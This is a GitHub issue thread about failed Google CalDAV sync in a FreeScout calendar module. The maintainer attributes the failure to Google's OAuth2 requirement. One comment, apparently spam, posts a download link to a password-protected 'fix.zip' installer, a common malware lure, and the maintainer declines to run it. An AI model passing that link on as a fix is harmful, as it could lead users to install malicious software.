### ISSUE TITLE
Caldav not working

### ISSUE THREAD

**Issue by yewkay** [LJPc-solutions/freescout-calendar-module#50]
I'm using the calendar module with Google using Caldav 
for Caldav URL i used "https://apidata.googleusercontent.com/caldav/v2/mygoogleuserid%40gmail.com/events"
Caldav password I used the google login password which I've checked that it is correct.

The calendar doesn't syncs and when i try to create a new event, it says fails "Failed to create event"

No errors appeared in logs.

**Comment by Lars-** [comment]
The module is tested with Baikal and Nextcloud. CalDAV unfortunately has a ton of variations in the implementation which make it almost impossible to implement all variations. 

It is also possible that you are simply using the wrong url. For example, using baikal I had to use this: https://[redacted]/dav.php/calendars/[myemail]/afspraken/ (this includes the name of the calendar: "afspraken")

**Comment by yewkay** [comment]
Thanks for the speedy reply, I'm using the same URL in Thunderbird to sync the caldav calendar, it's working there so I am thinking it should be the same.

**Comment by Lars-** [comment]
Maybe Thunderbird automatically adds something to the URL. If I remember correctly, if I did not include the calendar name for Baikal, I would get some sort of overview with all calendars without the possibility to add something.

**Comment by Lars-** [comment]
I did some research and it appears that you need OAuth2 to connect to CalDAV and since you can not add a bearer token right now, you can not connect to Google Calendar. Feel free to implement it.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lars-** [comment]
I have no clue what this is, but I will not run a random exe file.
